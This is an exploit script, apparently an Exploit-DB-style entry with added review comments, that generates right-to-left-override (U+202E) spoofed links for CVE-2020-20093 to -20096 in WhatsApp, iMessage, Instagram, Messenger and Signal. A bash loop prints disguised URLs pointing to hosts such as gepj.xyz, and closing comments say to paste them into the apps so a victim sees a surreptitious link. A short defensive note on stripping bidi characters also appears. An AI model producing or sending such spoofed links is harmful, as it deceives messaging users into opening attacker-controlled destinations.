# Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096
# Date: 24/03/2022
# Exploit Authors: zadewg & Sick Codes
# Vendor Homepage: https://www.meta.com
# Vendor Homepage: https://www.instagram.com
# Vendor Homepage: https://www.apple.com
# Vendor Homepage: https://www.signal.org
# Tested on: Whatsapp iOS
# Version 2.19.80 and below
# Tested on: Whatsapp Android
# Version 2.19.222 and below
# Tested on: Instagram iOS
# Version: 106.0 and below
# Tested on: Instagram Android
# Version: 107.0.0.11 and below
# Tested on: iMessage (Messages app)
# Version: iOS 14.3 and below
# Tested on: Facebook Messenger app iOS
# Version: 227.0 and below
# Tested on: Facebook Messenger app Android
# Version: 228.1.0.10.116 and below
# Tested on: Signal
# Version: 5.33.0.25 and below
# CVE: CVE-2020-20093
# CVE: CVE-2020-20094
# CVE: CVE-2020-20095
# CVE: CVE-2020-20096
#!/bin/bash
# Author: sickcodes
# Contact: https://twitter.com/sickcodes https://github.com/sickcodes
# Copyright: sickcodes (C) 2022
# License: GPLv3+
# References: https://github.com/zadewg/RIUS
# https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh
# https://sick.codes/sick-2022-40
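# Proof-of-concept output generator for the RTLO URI-spoofing issue tracked as
# CVE-2020-20093, CVE-2020-20094, CVE-2020-20095 and CVE-2020-20096.
#
# Each printed line is: APPEAR_AS, a slash, U+202E (RIGHT-TO-LEFT OVERRIDE),
# then one entry of DESTINATIONS. U+202E asks a bidi-aware renderer to draw
# the characters after it right-to-left, so the text a reader sees differs
# from the byte sequence a link parser receives.
#
# Defensive takeaway: a linkifier or link preview should strip or visibly
# escape bidi control characters (U+202A-U+202E, U+2066-U+2069) before
# rendering, and a content filter can flag any URL that contains one.
#
# NOTE(review): in this file the '#!/bin/bash' line sits below the advisory
# header, so it is not on line 1 and has no effect as a shebang; run the
# script with 'bash' explicitly. The '\u' escape in printf needs bash >= 4.2.

# Sample hosts appended after the override character.
# NOTE(review): 4pm.tv is listed twice; kept so the output is unchanged.
DESTINATIONS=(
  4pm.asia
  4pm.tv
  gepj.live
  gepj.xyz
  kpa.li
  xcod.xyz
  4pm.tv
  gepj.net
)

# Visible prefix of every generated sample.
APPEAR_AS='https://legit.okay/files'

#######################################
# Print one sample line: prefix, '/', U+202E, host, newline.
# Arguments: $1 - visible prefix, $2 - host placed after U+202E
# Outputs:   the sample line on stdout
#######################################
print_rtlo_sample() {
  # Fixed format string: the values are passed as data, so a '%' or a
  # backslash inside them is printed literally instead of being parsed by
  # printf (the original interpolated both variables into the format).
  printf '%s/\u202E%s\n' "$1" "$2"
}

for DESTINATION in "${DESTINATIONS[@]}"; do
  print_rtlo_sample "$APPEAR_AS" "$DESTINATION"
done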
# copy paste into any of the above apps.
# victim will see a surreptitious link
# works on latest Signal (unpatched)